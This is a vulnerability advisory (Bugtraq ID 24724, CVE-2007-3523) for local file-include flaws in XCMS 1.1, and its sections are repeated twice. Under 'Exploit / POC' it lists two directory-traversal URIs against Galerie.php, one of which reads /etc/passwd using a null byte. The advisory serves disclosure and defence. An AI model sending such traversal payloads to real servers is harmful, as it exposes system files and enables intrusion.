XCMS Multiple Local File Include Vulnerabilities
BID:24724
Info
XCMS Multiple Local File Include Vulnerabilities
| Bugtraq ID: | 24724 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-3523 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 30 2007 12:00AM |
| Updated: | May 07 2015 05:37PM |
| Credit: | BlackNDoor is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
XCMS XCMS 1.1 |
| Not Vulnerable: | |
Discussion
XCMS Multiple Local File Include Vulnerabilities
XCMS is prone to multiple local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow an attacker to access potentially sensitive information and execute arbitrary local scripts within the context of the webserver process.
These issues affect XCMS 1.1; other versions may also be affected.
XCMS is prone to multiple local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow an attacker to access potentially sensitive information and execute arbitrary local scripts within the context of the webserver process.
These issues affect XCMS 1.1; other versions may also be affected.
Exploit / POC
XCMS Multiple Local File Include Vulnerabilities
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/[path to XCMS]/Module/Galerie.php?Ent=../../../../../../etc/
http://www.example.com/[path to XCMS]/Module/Galerie.php?Lang=../../../../../../etc/passwd%00
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/[path to XCMS]/Module/Galerie.php?Ent=../../../../../../etc/
http://www.example.com/[path to XCMS]/Module/Galerie.php?Lang=../../../../../../etc/passwd%00
Solution / Fix
XCMS Multiple Local File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].